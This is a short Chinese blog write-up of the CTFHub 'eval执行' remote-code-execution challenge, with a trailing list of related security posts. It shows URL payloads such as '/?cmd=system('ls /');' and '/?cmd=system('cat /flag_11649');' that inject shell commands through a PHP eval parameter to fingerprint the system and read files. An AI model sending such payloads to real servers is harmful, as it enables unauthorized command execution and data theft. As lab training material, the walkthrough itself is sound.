CTFHub-RCE eval执行

观察源代码

  • 我们可以发现源代码是request请求,所以我们可以通过GET或者POST请求,利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码
#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显,说明命令执行成功,系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码
```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)
  • 显示只有index.php文件, 我们再查询根目录下的文件
复制代码
```php
/?cmd=system('ls /');
```
  • 发现目标flag文件

打开flag文件

复制代码
```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)
  • 成功获取flag
相关推荐
大方子12 小时前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha14 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络15 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd17 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你21 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha2 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1192 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20252 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec2 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用2 天前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云